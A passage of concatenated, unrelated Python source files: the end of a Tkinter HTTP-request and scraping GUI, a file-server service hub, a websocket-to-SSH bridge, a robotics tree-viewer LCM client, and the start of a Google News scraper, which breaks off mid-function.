            if key == config['focus']:
                nb.select(tab_id)  # restore focus to the tab active at last save

# === create / delete / help ===
# Bind the right-click context menu (labels are user-facing, kept verbatim).
bind_menu(create_new_reqtab, '创建请求标签 [Ctrl+q]')
bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]')
bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]')
bind_menu(save_config, '保存配置快照 [Ctrl+s]')
bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]')
bind_menu(create_helper, '帮助文档标签 [Ctrl+h]')
bind_menu(create_selenium_parse, '创建便捷浏览器执行窗')
bind_menu(create_encoder, '创建便捷加密编码窗口')

# Bind Ctrl + key combinations.
bind_ctl_key(create_new_reqtab, 'q')
bind_ctl_key(delete_curr_tab, 'w')
# Undo via ctrl+shift+w (only for saved configs; the undo queue is cleared on exit).
bind_ctl_key(cancel_delete, 'w',shift=True)
bind_ctl_key(change_tab_name, 'e')
bind_ctl_key(save_config, 's')
bind_ctl_key(send_request, 'r')
bind_ctl_key(create_helper, 'h')
bind_ctl_key(create_js_parse, 'j')

# Bind Alt + key events for working with responses.
bind_alt_key(create_new_rsptab, 'r')
bind_alt_key(create_test_code, 'c')  # generate request code
bind_alt_key(get_html_pure_text, 'd')  # extract plain text
bind_alt_key(get_xpath_elements, 'x')  # extract elements by xpath
bind_alt_key(get_auto_xpath, 'f')  # auto-detect an xpath
bind_alt_key(get_auto_json, 'z')  # analyze json lists
bind_alt_key(choice_auto_json, 'q')  # choose a json list
bind_alt_key(execute_code, 'v')  # run the generated code
bind_alt_key(create_scrapy_code, 's')  # generate scrapy code
bind_alt_key(execute_scrapy_code, 'w')  # run scrapy code in the auto-generated env
bind_alt_key(create_temp_idle, '`')  # open a temporary IDLE-like editor
bind_alt_key(create_test_code_urllib, 'u')  # generate a urllib (py3) request
def algo():
    """Launch only the standalone encoder/decoder helper window (no main UI).

    Used when the program is started with the 'e' command-line argument.
    """
    from .frame import encode_window
    fr = encode_window()
    ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
    fr.iconbitmap(ico)
    # Window title is user-facing text; kept verbatim.
    fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
    fr.bind('<Escape>',lambda *a:fr.master.quit())
    fr.bind('<Alt-`>',lambda *a:create_temp_idle())
    fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
    # The hidden master (root) window still drives the event loop.
    fr.master.withdraw()
    fr.mainloop()
# Populated lazily by preimport() below, if js2py is available.
escodegen = None

def execute():
    """Program entry point: start the main window (or the encoder-only UI)."""
    argv = sys.argv
    if 'e' in argv:
        # Encoder-only mode; skip the main window entirely.
        algo()
        return
    def preimport():
        global escodegen
        import time
        # Preload slow imports on a worker thread to keep the UI responsive.
        time.sleep(.5)
        try: import js2py
        except: pass
        try: import execjs
        except: pass
        try:
            import js2py.py_node_modules.escodegen as escodegen
        except: pass
    import threading
    threading.Thread(target=preimport).start()
    root.title('vrequest [{}]'.format(__version__))
    ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
    root.iconbitmap(ico)
    # Restore last saved geometry, falling back to a sane default.
    root.geometry(config.get('siz') or '600x725+100+100')
    root.bind('<Configure>',lambda e:change_siz())
    root.bind('<Escape>',lambda e:switch_response_log())
    def quit_():
        # Run registered cleanup callbacks, then tear down the UI.
        try:
            for tail in tails:
                try:
                    tail()
                except:
                    import traceback
                    print(traceback.format_exc())
        finally:
            root.destroy()
    root.protocol("WM_DELETE_WINDOW",lambda *a: quit_())
    root.mainloop()

if __name__ == '__main__':
    execute()
svchub.py | # coding: utf-8
from __future__ import print_function, unicode_literals
import os
import sys
import time
import shlex
import string
import signal
import socket
import threading
from datetime import datetime, timedelta
import calendar
from .__init__ import E, PY2, WINDOWS, ANYWIN, MACOS, VT100, unicode
from .util import mp, start_log_thrs, start_stackmon, min_ex, ansi_re
from .authsrv import AuthSrv
from .tcpsrv import TcpSrv
from .up2k import Up2k
from .th_srv import ThumbSrv, HAVE_PIL, HAVE_WEBP
class SvcHub(object):
    """
    Hosts all services which cannot be parallelized due to reliance on monolithic resources.
    Creates a Broker which does most of the heavy stuff; hosted services can use this to perform work:
        hub.broker.put(want_reply, destination, args_list).
    Either BrokerThr (plain threads) or BrokerMP (multiprocessing) is used depending on configuration.
    Nothing is returned synchronously; if you want any value returned from the call,
    put() can return a queue (if want_reply=True) which has a blocking get() with the response.
    """

    def __init__(self, args, argv, printed):
        # args: parsed argparse namespace; argv: raw argv (for the logfile
        # header); printed: startup text already shown, replayed into the log.
        self.args = args
        self.argv = argv
        self.logf = None
        self.stop_req = False
        self.stopping = False
        self.stop_cond = threading.Condition()
        self.httpsrv_up = 0
        self.log_mutex = threading.Lock()
        self.next_day = 0

        # -q silences console logging (file logging still works if --lo is set)
        self.log = self._log_disabled if args.q else self._log_enabled
        if args.lo:
            self._setup_logfile(printed)

        if args.stackmon:
            start_stackmon(args.stackmon, 0)

        if args.log_thrs:
            start_log_thrs(self.log, args.log_thrs, 0)

        # fpool is only safe/useful on windows by default
        if not ANYWIN and not args.use_fpool:
            args.no_fpool = True

        if not args.no_fpool and args.j != 1:
            m = "WARNING: --use-fpool combined with multithreading is untested and can probably cause undefined behavior"
            if ANYWIN:
                m = "windows cannot do multithreading without --no-fpool, so enabling that -- note that upload performance will suffer if you have microsoft defender \"real-time protection\" enabled, so you probably want to use -j 1 instead"
                args.no_fpool = True

            self.log("root", m, c=3)

        # initiate all services to manage
        self.asrv = AuthSrv(self.args, self.log)
        if args.ls:
            self.asrv.dbg_ls()

        self.tcpsrv = TcpSrv(self)
        self.up2k = Up2k(self)

        self.thumbsrv = None
        if not args.no_thumb:
            if HAVE_PIL:
                if not HAVE_WEBP:
                    args.th_no_webp = True
                    msg = "setting --th-no-webp because either libwebp is not available or your Pillow is too old"
                    self.log("thumb", msg, c=3)

                self.thumbsrv = ThumbSrv(self)
            else:
                msg = "need Pillow to create thumbnails; for example:\n{}{} -m pip install --user Pillow\n"
                self.log(
                    "thumb", msg.format(" " * 37, os.path.basename(sys.executable)), c=3
                )

        # decide which worker impl to use
        if self.check_mp_enable():
            from .broker_mp import BrokerMp as Broker
        else:
            self.log("root", "cannot efficiently use multiple CPU cores")
            from .broker_thr import BrokerThr as Broker

        self.broker = Broker(self)

    def thr_httpsrv_up(self):
        """Watchdog: after 5s, abort the process if any httpsrv worker failed to start."""
        time.sleep(5)
        failed = self.broker.num_workers - self.httpsrv_up
        if not failed:
            return

        m = "{}/{} workers failed to start"
        m = m.format(failed, self.broker.num_workers)
        self.log("root", m, 1)
        os._exit(1)

    def cb_httpsrv_up(self):
        """Callback from each httpsrv worker once it is listening; finishes startup when all are up."""
        self.httpsrv_up += 1
        if self.httpsrv_up != self.broker.num_workers:
            return

        self.log("root", "workers OK\n")
        self.up2k.init_vols()

        thr = threading.Thread(target=self.sd_notify, name="sd-notify")
        thr.daemon = True
        thr.start()

    def _logname(self):
        """Expand strftime-style %Y %m %d %H %M %S placeholders in the --lo logfile template."""
        dt = datetime.utcnow()
        fn = self.args.lo
        for fs in "YmdHMS":
            fs = "%" + fs
            if fs in fn:
                fn = fn.replace(fs, dt.strftime(fs))

        return fn

    def _setup_logfile(self, printed):
        """Open the logfile (xz-compressed if lzma is available) and write the startup header."""
        base_fn = fn = sel_fn = self._logname()
        if fn != self.args.lo:
            ctr = 0
            # yup this is a race; if started sufficiently concurrently, two
            # copyparties can grab the same logfile (considered and ignored)
            while os.path.exists(sel_fn):
                ctr += 1
                sel_fn = "{}.{}".format(fn, ctr)

        fn = sel_fn

        try:
            import lzma

            lh = lzma.open(fn, "wt", encoding="utf-8", errors="replace", preset=0)
        except:
            import codecs

            lh = codecs.open(fn, "w", encoding="utf-8", errors="replace")

        # remember the unsuffixed name so _set_next_day can detect rollover
        lh.base_fn = base_fn
        argv = [sys.executable] + self.argv
        if hasattr(shlex, "quote"):
            argv = [shlex.quote(x) for x in argv]
        else:
            argv = ['"{}"'.format(x) for x in argv]

        msg = "[+] opened logfile [{}]\n".format(fn)
        printed += msg
        lh.write("t0: {:.3f}\nargv: {}\n\n{}".format(E.t0, " ".join(argv), printed))
        self.logf = lh
        print(msg, end="")

    def run(self):
        """Start all services and block until shutdown."""
        self.tcpsrv.run()

        thr = threading.Thread(target=self.thr_httpsrv_up)
        thr.daemon = True
        thr.start()

        for sig in [signal.SIGINT, signal.SIGTERM]:
            signal.signal(sig, self.signal_handler)

        # macos hangs after shutdown on sigterm with while-sleep,
        # windows cannot ^c stop_cond (and win10 does the macos thing but winxp is fine??)
        # linux is fine with both,
        # never lucky
        if ANYWIN:
            # msys-python probably fine but >msys-python
            thr = threading.Thread(target=self.stop_thr, name="svchub-sig")
            thr.daemon = True
            thr.start()

            try:
                while not self.stop_req:
                    time.sleep(1)
            except:
                pass

            self.shutdown()
            thr.join()
        else:
            self.stop_thr()

    def stop_thr(self):
        """Wait (on the condition variable) until a stop is requested, then shut down."""
        while not self.stop_req:
            with self.stop_cond:
                self.stop_cond.wait(9001)

        self.shutdown()

    def signal_handler(self, sig, frame):
        """SIGINT/SIGTERM handler: request a stop and wake stop_thr()."""
        if self.stopping:
            return

        self.stop_req = True
        with self.stop_cond:
            self.stop_cond.notify_all()

    def shutdown(self):
        """Stop all services (idempotent) and exit the process."""
        if self.stopping:
            return

        # start_log_thrs(print, 0.1, 1)

        self.stopping = True
        self.stop_req = True
        with self.stop_cond:
            self.stop_cond.notify_all()

        ret = 1
        try:
            with self.log_mutex:
                print("OPYTHAT")

            self.tcpsrv.shutdown()
            self.broker.shutdown()
            self.up2k.shutdown()
            if self.thumbsrv:
                self.thumbsrv.shutdown()

                # give thumbnail workers up to 10s to wind down
                for n in range(200):  # 10s
                    time.sleep(0.05)
                    if self.thumbsrv.stopped():
                        break

                    if n == 3:
                        print("waiting for thumbsrv (10sec)...")

            print("nailed it", end="")
            ret = 0
        finally:
            print("\033[0m")
            if self.logf:
                self.logf.close()

            sys.exit(ret)

    def _log_disabled(self, src, msg, c=0):
        """Logging backend when -q is set: file only, no console output."""
        if not self.logf:
            return

        with self.log_mutex:
            ts = datetime.utcnow().strftime("%Y-%m%d-%H%M%S.%f")[:-3]
            self.logf.write("@{} [{}] {}\n".format(ts, src, msg))

            now = time.time()
            if now >= self.next_day:
                self._set_next_day()

    def _set_next_day(self):
        """Roll the logfile (if its name template changed) and compute the next midnight."""
        if self.next_day and self.logf and self.logf.base_fn != self._logname():
            self.logf.close()
            self._setup_logfile("")

        dt = datetime.utcnow()

        # unix timestamp of next 00:00:00 (leap-seconds safe)
        day_now = dt.day
        while dt.day == day_now:
            dt += timedelta(hours=12)

        dt = dt.replace(hour=0, minute=0, second=0)
        self.next_day = calendar.timegm(dt.utctimetuple())

    def _log_enabled(self, src, msg, c=0):
        """handles logging from all components"""
        with self.log_mutex:
            now = time.time()
            if now >= self.next_day:
                # print a date header once per day
                dt = datetime.utcfromtimestamp(now)
                print("\033[36m{}\033[0m\n".format(dt.strftime("%Y-%m-%d")), end="")
                self._set_next_day()

            fmt = "\033[36m{} \033[33m{:21} \033[0m{}\n"
            if not VT100:
                # terminal without ANSI support: strip escape codes
                fmt = "{} {:21} {}\n"
                if "\033" in msg:
                    msg = ansi_re.sub("", msg)
                if "\033" in src:
                    src = ansi_re.sub("", src)
            elif c:
                # c is either a color number or a raw ANSI prefix
                if isinstance(c, int):
                    msg = "\033[3{}m{}".format(c, msg)
                elif "\033" not in c:
                    msg = "\033[{}m{}\033[0m".format(c, msg)
                else:
                    msg = "{}{}\033[0m".format(c, msg)

            ts = datetime.utcfromtimestamp(now).strftime("%H:%M:%S.%f")[:-3]
            msg = fmt.format(ts, src, msg)
            try:
                print(msg, end="")
            except UnicodeEncodeError:
                try:
                    print(msg.encode("utf-8", "replace").decode(), end="")
                except:
                    print(msg.encode("ascii", "replace").decode(), end="")

            if self.logf:
                self.logf.write(msg)

    def check_mp_support(self):
        """Return an error string if multiprocessing is unusable here, else None."""
        vmin = sys.version_info[1]
        if WINDOWS:
            msg = "need python 3.3 or newer for multiprocessing;"
            if PY2 or vmin < 3:
                return msg
        elif MACOS:
            return "multiprocessing is wonky on mac osx;"
        else:
            msg = "need python 3.3+ for multiprocessing;"
            if PY2 or vmin < 3:
                return msg

        try:
            # smoke-test a queue roundtrip
            x = mp.Queue(1)
            x.put(["foo", "bar"])
            if x.get()[0] != "foo":
                raise Exception()
        except:
            return "multiprocessing is not supported on your platform;"

        return None

    def check_mp_enable(self):
        """Return True if multiprocessing should (and can) be used."""
        if self.args.j == 1:
            self.log("root", "multiprocessing disabled by argument -j 1;")
            return False

        if mp.cpu_count() <= 1:
            return False

        try:
            # support vscode debugger (bonus: same behavior as on windows)
            mp.set_start_method("spawn", True)
        except AttributeError:
            # py2.7 probably, anyways dontcare
            pass

        err = self.check_mp_support()
        if not err:
            return True
        else:
            self.log("svchub", err)
            return False

    def sd_notify(self):
        """Notify systemd (via NOTIFY_SOCKET, if present) that startup is complete."""
        try:
            addr = os.getenv("NOTIFY_SOCKET")
            if not addr:
                return

            addr = unicode(addr)
            if addr.startswith("@"):
                # abstract unix socket: leading @ maps to a NUL byte
                addr = "\0" + addr[1:]

            m = "".join(x for x in addr if x in string.printable)
            self.log("sd_notify", m)

            sck = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
            sck.connect(addr)
            sck.sendall(b"READY=1")
        except:
            self.log("sd_notify", min_ex())
|
server.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from threading import Thread
import paramiko
import json
from . import models
def add_log(user, content, log_type='1'):
    """Persist one access-log record; failures are printed, never raised."""
    try:
        models.AccessLog.objects.create(
            user=user,
            log_type=log_type,
            content=content
        )
    except Exception as exc:
        print(_('Error occurred while saving the log:'), exc)
class WSSHBridge:
    """
    Core bridge between a websocket and an interactive SSH session.
    """

    def __init__(self, websocket, user):
        self.user = user
        self._websocket = websocket
        self._tasks = []
        self.trans = None  # paramiko.Transport once open() succeeds
        self.channel = None  # interactive shell channel
        self.cmd_string = ''  # accumulated command input (kept for auditing)

    def open(self, host_ip, port=22, username=None, password=None):
        """
        Establish the SSH connection and start an interactive shell.

        :param host_ip: target host address
        :param port: ssh port, default 22
        :param username: login name
        :param password: login password
        :raises: re-raises the connection error after reporting it to the peer
        """
        try:
            self.trans = paramiko.Transport((host_ip, port))
            self.trans.start_client()
            self.trans.auth_password(username=username, password=password)
            self.trans.set_keepalive(30)
            self.channel = self.trans.open_session()
            self.channel.get_pty()
            self.channel.invoke_shell()
        except Exception as e:
            # BUG FIX: exception objects are not JSON-serializable;
            # the old `json.dumps({'error': e})` raised TypeError and
            # masked the original error. Send the message text instead.
            self._websocket.send(json.dumps({'error': str(e)}))
            raise

    def _forward_inbound(self, data):
        """
        Forward one chunk of input: websocket -> ssh.

        :param data: raw input from the websocket peer
        """
        try:
            self.channel.send(data)
            return
        except Exception:
            self.close()

    def _forward_outbound(self):
        """
        Pump output: ssh -> websocket, until the channel is closed.
        """
        try:
            while True:
                # NOTE(review): decoding fixed 1024-byte chunks can split a
                # multi-byte utf-8 sequence -- consider an incremental decoder.
                data = self.channel.recv(1024).decode('utf-8')
                if not len(data):
                    return
                # BUG FIX: `data` is already a str here; the old code called
                # .decode() on it again, raising AttributeError on python 3.
                self._websocket.send(json.dumps({'data': data}))
        except Exception:
            self.close()

    def close(self):
        """
        Terminate the bridged session: close both the channel and the socket.
        """
        self.channel.close()
        self._websocket.close()

    def shell(self, data):
        """
        Start the bridge: one thread per direction.
        """
        Thread(target=self._forward_inbound, args=(data,)).start()
        Thread(target=self._forward_outbound).start()
|
viewerclient.py |
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
    """Hands out process-unique client identifiers."""

    def __init__(self):
        self.pid = os.getpid()
        self.counter = 0

    def new_client_id(self):
        """Return a fresh id of the form ``py_<pid>_<counter>``."""
        self.counter += 1
        return "py_{:d}_{:d}".format(self.pid, self.counter)


CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
    """Serialize a command dict into a ``viewer2_comms_t`` LCM message."""
    message = viewer2_comms_t()
    message.utime = data["utime"]
    message.format = "treeviewer_json"
    message.format_version_major = 1
    message.format_version_minor = 0
    payload = bytearray(json.dumps(data), encoding='utf-8')
    message.data = payload
    message.num_bytes = len(payload)
    return message
def serialize_transform(tform):
    """Split a 4x4 homogeneous matrix into translation + quaternion lists."""
    translation = transformations.translation_from_matrix(tform)
    quaternion = transformations.quaternion_from_matrix(tform)
    return {
        "translation": list(translation),
        "quaternion": list(quaternion)
    }
class GeometryData(object):
    """Pairs a geometry with its RGBA color and local 4x4 transform."""
    __slots__ = ["geometry", "color", "transform"]

    def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
        self.geometry = geometry
        self.color = color
        self.transform = transform

    def serialize(self):
        """Return the geometry's dict form, with color and transform folded in."""
        serialized = self.geometry.serialize()
        serialized["color"] = list(self.color)
        serialized["transform"] = serialize_transform(self.transform)
        return serialized
class BaseGeometry(object):
    """Abstract base for viewer geometries; subclasses must implement serialize()."""

    def serialize(self):
        raise NotImplementedError()
class Box(BaseGeometry):
    """Axis-aligned box described by its three edge lengths."""
    __slots__ = ["lengths"]

    def __init__(self, lengths=None):
        # Was `lengths=[1, 1, 1]`: a single shared mutable default list,
        # so mutating one default-constructed box leaked into all others.
        self.lengths = [1, 1, 1] if lengths is None else lengths

    def serialize(self):
        return {
            "type": "box",
            "lengths": list(self.lengths)
        }
class Sphere(BaseGeometry):
    """Sphere described by its radius."""
    __slots__ = ["radius"]

    def __init__(self, radius=1):
        self.radius = radius

    def serialize(self):
        return {
            "type": "sphere",
            "radius": self.radius
        }
class Ellipsoid(BaseGeometry):
    """Ellipsoid described by its three semi-axis radii."""
    __slots__ = ["radii"]

    def __init__(self, radii=None):
        # Was `radii=[1, 1, 1]`: a shared mutable default list; every
        # instance now gets its own copy.
        self.radii = [1, 1, 1] if radii is None else radii

    def serialize(self):
        return {
            "type": "ellipsoid",
            "radii": list(self.radii)
        }
class Cylinder(BaseGeometry):
    """Cylinder described by its length and radius."""
    __slots__ = ["length", "radius"]

    def __init__(self, length=1, radius=1):
        self.length = length
        self.radius = radius

    def serialize(self):
        return {
            "type": "cylinder",
            "length": self.length,
            "radius": self.radius
        }
class Triad(BaseGeometry):
    """Coordinate-axes marker; optionally drawn with tube-shaped axes."""
    __slots__ = ["tube", "scale"]

    def __init__(self, scale=1.0, tube=False):
        self.scale = scale
        self.tube = tube

    def serialize(self):
        return {
            "type": "triad",
            "scale": self.scale,
            "tube": self.tube
        }
class PointCloud(BaseGeometry):
    """Point cloud with optional per-point channels (e.g. colors)."""
    __slots__ = ["points", "channels"]

    def __init__(self, points, channels=None):
        self.points = points
        # Was `channels={}`: a shared mutable default dict across all
        # instances; use a fresh dict per instance instead.
        self.channels = {} if channels is None else channels

    def serialize(self):
        return {
            "type": "pointcloud",
            "points": [list(p) for p in self.points],
            "channels": {name: [list(c) for c in values] for (name, values) in self.channels.items()}
        }
class PolyLine(BaseGeometry):
    """Connected line segments with optional arrow heads at either end."""

    def __init__(self, points, radius=0.01, closed=False,
                 start_head=False, end_head=False,
                 head_radius=0.05, head_length=None):
        self.points = points
        self.radius = radius
        self.closed = closed
        self.start_head = start_head
        self.end_head = end_head
        self.head_radius = head_radius
        # Arrow heads default to being as long as they are wide.
        self.head_length = head_radius if head_length is None else head_length

    def serialize(self):
        payload = {
            "type": "line",
            "points": [list(p) for p in self.points],
            "radius": self.radius,
            "closed": self.closed
        }
        if self.start_head or self.end_head:
            payload["start_head"] = self.start_head
            payload["end_head"] = self.end_head
            payload["head_radius"] = self.head_radius
            payload["head_length"] = self.head_length
        return payload
class LazyTree(object):
    """Tree node whose children spring into existence on first access."""
    __slots__ = ["geometries", "transform", "children"]

    def __init__(self, geometries=None, transform=None):
        self.geometries = [] if geometries is None else geometries
        # Was `transform=np.eye(4)` as the default argument: that single
        # array was shared by every default-constructed node, so an in-place
        # edit of one node's transform leaked into all the others.
        self.transform = np.eye(4) if transform is None else transform
        self.children = defaultdict(lambda: LazyTree())

    def __getitem__(self, item):
        return self.children[item]

    def getdescendant(self, path):
        """Walk (creating as needed) down `path` and return the final node."""
        node = self
        for key in path:
            node = node[key]
        return node

    def descendants(self, prefix=tuple()):
        """Return the paths of all existing descendants, depth-first."""
        paths = []
        for (key, child) in list(self.children.items()):
            childpath = prefix + (key,)
            paths.append(childpath)
            paths.extend(child.descendants(childpath))
        return paths
class CommandQueue(object):
    """Tracks which paths have pending settransform/setgeometry/delete commands."""

    def __init__(self):
        # Starting state is identical to a just-flushed queue.
        self.empty()

    def isempty(self):
        return not (self.settransform or self.setgeometry or self.delete)

    def empty(self):
        """Discard all pending commands."""
        self.settransform = set()
        self.setgeometry = set()
        self.delete = set()
class Visualizer(object):
    """
    A lightweight handle combining a CoreVisualizer with a path.

    The CoreVisualizer does all of the work of storing geometries and
    publishing LCM messages; keeping the path here makes it cheap to store
    or pass around a view onto a sub-part of the viewer tree.
    Many Visualizer objects can all share the same CoreVisualizer.
    """
    __slots__ = ["core", "path"]

    def __init__(self, path=None, lcm=None, core=None):
        if core is None:
            core = CoreVisualizer(lcm)
        if path is None:
            path = tuple()
        else:
            if isinstance(path, str):
                path = tuple(path.split("/"))
            if not path[0]:
                # drop empty components (e.g. a leading "/")
                path = tuple(p for p in path if p)
        self.core = core
        self.path = path

    def setgeometry(self, geomdata):
        """
        Set the geometries at this visualizer's path to the given
        geomdata (replacing whatever was there before).

        geomdata can be any one of:
          * a single BaseGeometry
          * a single GeometryData
          * a collection of any combinations of BaseGeometry and GeometryData
        """
        self.core.setgeometry(self.path, geomdata)
        return self

    def settransform(self, tform):
        """
        Set the transform for this visualizer's path (and, implicitly, any
        descendants of that path). tform is a 4x4 homogeneous matrix.
        """
        self.core.settransform(self.path, tform)

    def delete(self):
        """
        Delete the geometry at this visualizer's path.
        """
        self.core.delete(self.path)

    def __getitem__(self, path):
        """
        Indexing returns a new visualizer whose path is this one's path with
        the given component appended.
        """
        return Visualizer(path=self.path + (path,),
                          lcm=self.core.lcm,
                          core=self.core)

    def start_handler(self):
        """
        Start a background thread that services responses from the remote
        viewer, enabling automatic geometry reload if the viewer restarts.
        """
        self.core.start_handler()
class CoreVisualizer(object):
    """Owns the geometry tree and the LCM link to the remote tree viewer.

    All Visualizer handles sharing this core funnel their setgeometry /
    settransform / delete calls through a CommandQueue which is flushed to
    the viewer by publish().
    """

    def __init__(self, lcm=None):
        if lcm is None:
            lcm = LCM()
        self.lcm = lcm
        self.client_id = CLIENT_ID_FACTORY.new_client_id()
        self.tree = LazyTree()
        self.queue = CommandQueue()
        # When True, every mutation publishes immediately; otherwise the
        # caller must invoke publish() manually to flush the queue.
        self.publish_immediately = True
        self.lcm.subscribe(self._response_channel(),
                           self._handle_response)
        self.handler_thread = None

    def _request_channel(self):
        return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)

    def _response_channel(self):
        return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)

    def _handler_loop(self):
        while True:
            self.lcm.handle()

    def start_handler(self):
        """Start the response-handling thread (idempotent)."""
        if self.handler_thread is not None:
            return
        self.handler_thread = threading.Thread(
            target=self._handler_loop)
        self.handler_thread.daemon = True
        self.handler_thread.start()

    def _handle_response(self, channel, msgdata):
        msg = viewer2_comms_t.decode(msgdata)
        data = json.loads(msg.data.decode())
        if data["status"] == 0:
            pass
        elif data["status"] == 1:
            # Viewer restarted and lost state: re-queue everything we know.
            for path in self.tree.descendants():
                self.queue.setgeometry.add(path)
                self.queue.settransform.add(path)
        else:
            raise ValueError(
                "Unhandled response from viewer: {}".format(msg.data.decode()))

    def setgeometry(self, path, geomdata):
        """Replace the geometry list stored at `path` with `geomdata`."""
        # BUG FIX: `collections.Iterable` (imported at module level) was
        # removed in Python 3.10; use the canonical ABC location instead.
        from collections.abc import Iterable

        if isinstance(geomdata, BaseGeometry):
            self._load(path, [GeometryData(geomdata)])
        elif isinstance(geomdata, Iterable):
            self._load(path, geomdata)
        else:
            self._load(path, [geomdata])

    def _load(self, path, geoms):
        # Normalize everything to GeometryData before storing.
        converted_geom_data = []
        for geom in geoms:
            if isinstance(geom, GeometryData):
                converted_geom_data.append(geom)
            else:
                converted_geom_data.append(GeometryData(geom))
        self.tree.getdescendant(path).geometries = converted_geom_data
        self.queue.setgeometry.add(path)
        self._maybe_publish()

    def settransform(self, path, tform):
        self.tree.getdescendant(path).transform = tform
        self.queue.settransform.add(path)
        self._maybe_publish()

    def delete(self, path):
        if not path:
            # Deleting the root wipes the whole tree.
            self.tree = LazyTree()
        else:
            t = self.tree.getdescendant(path[:-1])
            if path[-1] in t.children:
                del t.children[path[-1]]
        self.queue.delete.add(path)
        self._maybe_publish()

    def _maybe_publish(self):
        if self.publish_immediately:
            self.publish()

    def publish(self):
        """Flush all queued commands to the viewer in a single LCM message."""
        if not self.queue.isempty():
            data = self.serialize_queue()
            msg = to_lcm(data)
            self.lcm.publish(self._request_channel(), msg.encode())
            self.queue.empty()

    def serialize_queue(self):
        """Convert the pending command queue into the wire-format dict."""
        delete = []
        setgeometry = []
        settransform = []
        for path in self.queue.delete:
            delete.append({"path": path})
        for path in self.queue.setgeometry:
            geoms = self.tree.getdescendant(path).geometries or []
            setgeometry.append({
                "path": path,
                "geometries": [geom.serialize() for geom in geoms]
            })
        for path in self.queue.settransform:
            settransform.append({
                "path": path,
                "transform": serialize_transform(
                    self.tree.getdescendant(path).transform)
            })
        return {
            "utime": int(time.time() * 1e6),
            "delete": delete,
            "setgeometry": setgeometry,
            "settransform": settransform
        }
if __name__ == '__main__':
    # Demo/smoke-test: requires a running drake-visualizer / director viewer
    # listening on LCM; nothing is asserted, output is purely visual.

    # We can provide an initial path if we want
    vis = Visualizer(path="/root/folder1")

    # Start a thread to handle responses from the viewer. Doing this enables
    # the automatic reloading of missing geometry if the viewer is restarted.
    vis.start_handler()

    # A row of ten randomly-colored unit boxes along x.
    vis["boxes"].setgeometry(
        [GeometryData(Box([1, 1, 1]),
                      color=np.random.rand(4),
                      transform=transformations.translation_matrix([x, -2, 0]))
         for x in range(10)])

    # Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
    # implemented, so these sub-visualizers come into being as soon as they're
    # asked for
    vis = vis["group1"]
    box_vis = vis["box"]
    sphere_vis = vis["sphere"]

    box = Box([1, 1, 1])
    geom = GeometryData(box, color=[0, 1, 0, 0.5])
    box_vis.setgeometry(geom)
    sphere_vis.setgeometry(Sphere(0.5))
    sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))

    vis["test"].setgeometry(Triad())
    vis["test"].settransform(transformations.concatenate_matrices(
        transformations.rotation_matrix(1.0, [0, 0, 1]),
        transformations.translation_matrix([-1, 0, 1])))

    vis["triad"].setgeometry(Triad())

    # Setting the geometry preserves the transform at that path.
    # Call settransform(np.eye(4)) if you want to clear the transform.
    vis["test"].setgeometry(Triad())

    # bug, the sphere is loaded and replaces the previous
    # geometry but it is not drawn with the correct color mode
    vis["test"].setgeometry(Sphere(0.5))

    # Spin the whole group around the z axis.
    for theta in np.linspace(0, 2 * np.pi, 100):
        vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
        time.sleep(0.01)

    #vis.delete()
|
core.py | from __future__ import print_function
import errno
import logging
import os
import pickle
import random
import re
import time
import requests
import threading
import json
import urllib.request
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
from newspaper import Article
from datetime import datetime, timedelta
from dateutil import parser
from queue import Queue
from urllib.parse import quote
from unidecode import unidecode
import dateparser
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT = 0
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbs=cdr%3A1%2Ccd_min%3A{}%2Ccd_max%3A{}&tbm=nws&start={}'
logging.basicConfig(
level = logging.DEBUG, format = '%(asctime)s - %(levelname)s - %(message)s'
)
def get_date(load):
    """Extract the first three numbers from `load` (expected M/D/Y order)
    and return them as a 'YYYY-MM-DD' string.

    Returns False when fewer than three numbers are present or `load` is
    not a string.
    """
    try:
        # Raw string for the regex (the original relied on '\d' surviving
        # non-raw string escaping, which is deprecated).
        date = re.findall(
            r'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', load
        )
        return '%s-%s-%s' % (date[2], date[0], date[1])
    # BUG FIX: the original read `except Exce:` — an undefined name, so the
    # handler itself raised NameError instead of returning False.
    except (IndexError, TypeError):
        return False
def run_parallel_in_threads(target, args_list):
    """Invoke `target` once per argument tuple in `args_list`, each call on
    its own thread, and return the non-falsy results (order not guaranteed).
    """
    collected = Queue()

    def _worker(*call_args):
        collected.put(target(*call_args))

    workers = [
        threading.Thread(target=_worker, args=call_args)
        for call_args in args_list
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()

    outputs = []
    while not collected.empty():
        outputs.append(collected.get())
    # Drop falsy entries (None, False, '', 0), as filter(None, ...) did.
    return [item for item in outputs if item]
def forge_url(q, start, year_start, year_end):
    """Build a Google News search URL for query `q`, restricted to the
    `year_start`..`year_end` date range, starting at result offset `start`.

    Side effect: increments the module-level request counter.
    """
    global NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
    NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT += 1
    query = q.replace(' ', '+')
